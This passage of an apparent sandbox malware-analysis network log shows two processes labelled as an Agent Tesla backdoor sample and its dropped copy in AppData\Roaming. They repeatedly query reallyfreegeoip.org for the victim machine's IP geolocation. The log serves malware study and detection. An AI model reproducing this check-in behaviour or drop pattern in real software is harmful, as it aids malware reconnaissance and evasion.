2024-10-22 13:42:27 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49748	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:28 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:28 UTC	890	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:28 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29904 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QrHsVAlJtScTjsDzyDwYoA0omyFrToNeNABNRoC1mAcGWo5u%2BLE8PwVgi8FtvU1Fvtvs7ITd7g6tzSRYc2T0F8aoqr0df3Pkt8rJliKaD5JNjrxOtpCjuxcIPKnyNvcHB7pAUe1J"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e92b8b873464-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1114&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2454237&cwnd=251&unsent_bytes=0&cid=c2fdbfd5cd9d739e&ts=196&x=0"
2024-10-22 13:42:28 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.6	49753	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:29 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:29 UTC	895	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:29 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29905 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tdTVsOVEodY1o5LkwH3MQQP2HhwsEkDO5o%2BVCIkrKxPpqSdf7v8XHQY4XMkyjqeMBiSvd1Xrc3jwc2nEYYaFOtpaMenij7ViokC%2B8rwkNxGTi8BdnPSSh3lvSdnd%2BPFABjID%2FUPY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e932ff8d4677-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=964&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=2952089&cwnd=247&unsent_bytes=0&cid=c2f859db36df24ac&ts=151&x=0"
2024-10-22 13:42:29 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:29 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49760	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:30 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:30 UTC	890	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:30 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29906 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bqco078SONaBixlJG6oDPAUhPmUmSmmhN0KLuc%2FN4KefuFBh77mmN9zFQ167UX9eYjpYL6CbfUTfOAlDuEuxVMPp9RAing3U257m7Sievn9W6293ui4Qw6upHzlZjtftZJqZClVT"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e935f8e6e932-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1085&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2606660&cwnd=246&unsent_bytes=0&cid=6b181fbd6f1fbabf&ts=154&x=0"
2024-10-22 13:42:30 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:30 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49768	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:31 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:31 UTC	894	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29907 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Wy9LaNOVX4qdHxgJvBsaicdvSpW2smGAjvv2ouPaqxK7NvtCM%2FpyGZGemkXRFLMYHSD2lJeu5JAr2ivTNuRC%2FkdETbxDxZUnbxF2aUD7ex4OwE5hhCzn1maixBJ%2BZWzjln1ZyMKS"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e93e295ce7d3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1207&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2423430&cwnd=231&unsent_bytes=0&cid=89f4e8df0794a5fa&ts=168&x=0"
2024-10-22 13:42:31 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49774	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:31 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:31 UTC	896	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:31 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29907 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=60a%2FgdBdwJac4OD%2BgBPpdaTFp5CIfPB%2FzkLers5giU7SZhWihvCcrcV1Jq7Wn4CF3jWvQH3PXR40Q6RwSNwDzZvJCb5QjCJrVgj8vucMzWhqE4NignskCL8Ka%2FoKA08tpiPYo6hr"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e9401d5b6c81-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1085&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2547053&cwnd=251&unsent_bytes=0&cid=465f38eee8c695a9&ts=147&x=0"
2024-10-22 13:42:31 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49783	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:33 UTC	87	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-22 13:42:33 UTC	892	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29909 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=21xgx8y22z45Xt%2F1J0jug2W36T12NZFGpkmnaCFrjkrWThOtRsDbMVcUOg0tmmweET3IM5r51dSbmOwRdzV9OpR6VTZmjGSyTUATGDEZvWYvpY2f4z%2Fr4myVp1KerOHeJqeOCbKh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e94a7ed62e6a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1421&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1970068&cwnd=250&unsent_bytes=0&cid=bb25e11bd3692a4b&ts=151&x=0"
2024-10-22 13:42:33 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49784	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:33 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:33 UTC	894	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:33 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29909 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OcJH849vPcx4WUdb%2F2ivjKFR8LBCBUDvKOBCScqTIRrv4mP9i5ac4aD0t6YCiCW3rjfWW9qtHQK8dkzLBRIzgiE9YHKAk%2BPE49aIVFDkuBZ3%2FWOIRGrJ8LdWOaeLb4zZe4lM8NRv"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e94a9d51e76a-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1380&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2033707&cwnd=241&unsent_bytes=0&cid=58aa4188dfce58bb&ts=152&x=0"
2024-10-22 13:42:33 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49799	188.114.96.3	443	2488	C:\Users\user\AppData\Roaming\xRAvleeiuDbJ.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:35 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:35 UTC	902	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29911 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qn3dQgw5R4DH1y8ODos8QPZJQKlfFzYLS%2Be0rvaonXpBgRq%2FtFEN%2FCUaeuLa3IfNDa1n8G%2BB6mIjTb4p3GDBDkxykG4GOTQJvNbuhCnM%2FOSoh3TfyzkOb%2F9Zyi4Xm%2FRzCYP89fzx"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e95a08346b71-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1194&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2333601&cwnd=251&unsent_bytes=0&cid=8c6bf7c93e2491b9&ts=149&x=0"
2024-10-22 13:42:35 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Killeen</City><ZipCode>76549</ZipCode><TimeZone>America/Chicago</Time
2024-10-22 13:42:35 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49798	188.114.96.3	443	3220	C:\Users\user\Desktop\SecuriteInfo.com.BackDoor.AgentTeslaNET.20.5206.2075.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-22 13:42:35 UTC	63	OUT	GET /xml/173.254.250.76 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-22 13:42:35 UTC	896	IN	HTTP/1.1 200 OK Date: Tue, 22 Oct 2024 13:42:35 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 29911 Last-Modified: Tue, 22 Oct 2024 05:24:04 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XSNwgxXGuZGBKY%2FQp9TNsZbTKx8mfOnTdLJzF%2F5cDVIkSqqvCP%2FIEP9czwLZ7pPBqn%2BUCJXAVCQOSU87tXgiw3PDIHQKr9BYgt7h7QnUesWZYkKGyKuIlSFAYPAYMr3XXhjd5Q2j"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d69e95a2e6e2e71-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1398&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2081955&cwnd=251&unsent_bytes=0&cid=710c52cf5e32e43b&ts=150&x=0"
2024-10-22 13:42:35 UTC	366	IN	Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4b 69 6c 6c 65 65 6e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 36 35 34 39 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 Data Ascii: 167<Response><IP>173.254.250.76</IP><CountryCode>US</CountryCode><CountryName>United 